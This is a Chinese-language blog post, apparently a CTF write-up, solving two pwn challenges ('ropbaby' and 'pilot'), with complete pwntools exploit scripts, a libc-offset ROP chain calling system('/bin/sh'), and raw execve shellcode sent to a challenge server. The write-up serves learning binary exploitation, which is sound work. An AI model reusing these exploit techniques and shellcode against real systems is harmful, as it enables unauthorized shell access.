<!DOCTYPE html><html lang="zh-cn"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no"><meta name="format-detection" content="telephone=no"><meta name="format-detection" content="email=no"><meta name="description"><meta name="keywords" content="Hexo, Gruntjs, Nodejs, Reactjs, Vuejs"><title> 实验吧  - NO</title><link rel="stylesheet" href="/css/main_style.min.css"><link rel="icon" href="/favicon.ico"></head><body><input id="navi" type="checkbox"><ul class="main-navication"><li><a href="/"><span>Home</span></a></li><li><a href="https://norw1nd.github.io/"><span>Norw1nd‘blog</span></a></li><li><a href="https://no4l.github.io/"><span>no4l’blog</span></a></li></ul><div class="wrapper" id="wrap"><div class="post-header"><label class="navi-button light" for="navi">MENU</label><img class="background" src="http://callfiles.ueibo.com/hexo-theme-laughing/post_background.jpg"><div class="post-title"><h1 class="title"> 实验吧 </h1><ul class="meta"><li><i class="icon icon-author"></i>会飞的鱼</li><li><i class="icon icon-clock"></i>5 Minutes</li><li><i class="icon icon-calendar"></i>November 29, 2018</li></ul></div></div><div class="article-content" style="max-width:800px"><p>实验吧的re和pwn题汇总</p>
<h2 id="1-ropbaby"><a href="#1-ropbaby" class="headerlink" title="1.ropbaby"></a>1.ropbaby</h2><p>这是defcon2015的一道题</p>
<p>先查看程序保护机制</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 17_37_06-启动.png" alt=""></p>
<p>开启了NX，无法写入shellcode，联系题目，想到用rop攻击</p>
<p>查看程序功能</p>
<p><img src="/2018/11/29/实验吧/E:/blog\hexo\source\_posts\实验吧\2018-11-29 19_47_42-启动.png" alt=""></p>
<p>这里功能2可以得出system函数的地址，大大降低了题目的难度</p>
<p>放到ida里查看源码</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 19_38_58-启动.png" alt=""></p>
<p>memcpy是危险函数，可以发现</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 19_40_17-启动.png" alt=""></p>
<p>savedregs距离ebp是0</p>
<p>64位程序int类型变量占8个字节长度，所以可以在此覆盖ret（64位是8个长度一定不要忘辽。。。）</p>
<p>查看字符串和调用函数，没有调用system（‘/bin/sh’），但是题目中给出看libc版本，而且题目中可以得出system的地址，只要找出system的偏移，就能求出libcbase，成功构建rop链</p>
<p>1.找system偏移</p>
<p>objdump -T libc-2.23.so | grep system</p>
<p><img src="/2018/11/29/实验吧/E:/blog\hexo\source\_posts\实验吧\2018-11-29 19_54_19-启动.png" alt=""></p>
<p>2.寻找‘/bin/sh’的偏移</p>
<p>strings -a -tx libc-2.23.so | grep /bin/sh</p>
<p><img src="/2018/11/29/实验吧/E:/blog\hexo\source\_posts\实验吧\2018-11-29 19_57_13-启动.png" alt=""></p>
<p>3.找gadgets的偏移</p>
<p>ROPgadget –binary libc-2.23.so –only “pop|ret”</p>
<p><img src="/2018/11/29/实验吧/E:/blog\hexo\source\_posts\实验吧\2018-11-29 20_08_52-启动.png" alt=""></p>
<p>exp:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line">p=remote(&apos;106.2.25.7&apos;,&apos;8004&apos;)</span><br><span class="line"></span><br><span class="line">print(p.recv())</span><br><span class="line">p.sendline(&apos;2&apos;)</span><br><span class="line">p.sendline(&apos;system&apos;)</span><br><span class="line">system_addr=int (p.recvline()[29::],16)</span><br><span class="line">print(&quot;[+]system_addr:&quot;+hex(system_addr))</span><br><span class="line">base_addr=system_addr-0x45390</span><br><span class="line">binsh_addr=base_addr+0x18cd17</span><br><span class="line">print(&quot;[+]binsh: &quot;+hex(binsh_addr))</span><br><span class="line">gadget_addr=base_addr+0x21102</span><br><span class="line">payload=&apos;a&apos;*8+p64(gadget_addr)+p64(binsh_addr)+p64(system_addr)</span><br><span class="line">p.sendline(&apos;3&apos;)</span><br><span class="line">p.recvuntil(&apos;Enter bytes to send (max 1024): &apos;)</span><br><span class="line">p.sendline(&apos;32&apos;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="/2018/11/29/实验吧/2018-11-29 20_28_41-启动.png" alt=""></p>
<h2 id="2-pilot"><a href="#2-pilot" class="headerlink" title="2.pilot"></a>2.pilot</h2><p>思路：栈溢出，写入shellcode，控制程序执行shellcode</p>
<p>1.程序保护机制</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 23_17_35-启动.png" alt=""></p>
<p>未开NX可以往栈上写shellcode</p>
<p>2.ida查看源码，发现溢出点，并找出溢出长度为40</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 23_19_58-启动.png" alt=""></p>
<p>3.控制程序执行shellcode的关键是找出shellcode的地址，但是第一步中知道开启了RELRO，地址随机化，简单的是，给出了提示</p>
<p><img src="/2018/11/29/实验吧/2018-11-29 23_23_03-启动.png" alt=""></p>
<p>exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line"></span><br><span class="line">p=remote(&apos;106.2.25.7&apos;,8003)</span><br><span class="line">p.recvuntil(&apos;Location:&apos;)</span><br><span class="line">ret_addr=int(p.recvuntil(&apos;\n&apos;)[:-1],16)</span><br><span class="line">#shellcode=&apos;\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05&apos;</span><br><span class="line">shellcode=&quot;\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05&quot;</span><br><span class="line">payload=shellcode+(40-len(shellcode))*&apos;a&apos;+p64(ret_addr)</span><br><span class="line">p.recvuntil(&apos;Command:&apos;)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<p>两种shellcode都可以，附上shelloce集合</p>
<p><a href="https://coding.net/u/yihangwang/p/shellcode_spider/git/tree/master/cache/Lin_x86-64/Linux_x86-64_-_execve__bin_bash__Shellcode__33_bytes" target="_blank" rel="noopener">https://coding.net/u/yihangwang/p/shellcode_spider/git/tree/master/cache/Lin_x86-64/Linux_x86-64_-_execve__bin_bash__Shellcode__33_bytes</a> </p>
</div><div class="article-meta" style="max-width:800px"></div><div class="article-comment" style="max-width:800px"><div class="ds-thread" id="ds-thread" data-thread-key="cjsvycrs5000jk8u2qnkg7vs6" data-title=" 实验吧 " data-url="http://yoursite.com/2018/11/29/实验吧/" site-name="ueibo"></div><script>var siteName = document.getElementById('ds-thread').getAttribute('site-name');
var duoshuoQuery = {short_name: siteName};
(function() {
  var ds = document.createElement('script');
  ds.type = 'text/javascript';ds.async = true;
  ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
  ds.charset = 'UTF-8';
  (document.getElementsByTagName('head')[0] 
  || document.getElementsByTagName('body')[0]).appendChild(ds);
})();</script></div><ul class="navication"><li class="home"><a href="/"><i class="icon icon-home"></i></a></li><li><a href="/2018/12/01/pwntools学习/"><i class="icon icon-arror-left"></i></a></li><li><a href="/2018/11/27/gdb-gef安装/"><i class="icon icon-arror-right"></i></a></li></ul><div class="page-footer"><div class="top"><ul class="social"><li><a href="https://github.com/BoizZ" title="Github" target="_blank"><i class="icon icon-github"></i></a></li><li><a title="Weibo" target="_blank"><i class="icon icon-weibo"></i></a></li><li><a title="SegmentFault" target="_blank"><i class="icon icon-segmentfault"></i></a></li></ul></div><div class="bottom"><p class="copyright">© 2019 NO<br><small>POWER BY <a href="https://hexo.io" target="_blank">HEXO</a></small><small>, THEME BY <a href="https://github.com/BoizZ/hexo-theme-laughing" target="_blank">LAUGHING</a></small></p></div></div></div><script>var wrap = document.getElementById('wrap');
window.onload = function () {
  wrap.className += ' done';
}</script></body></html>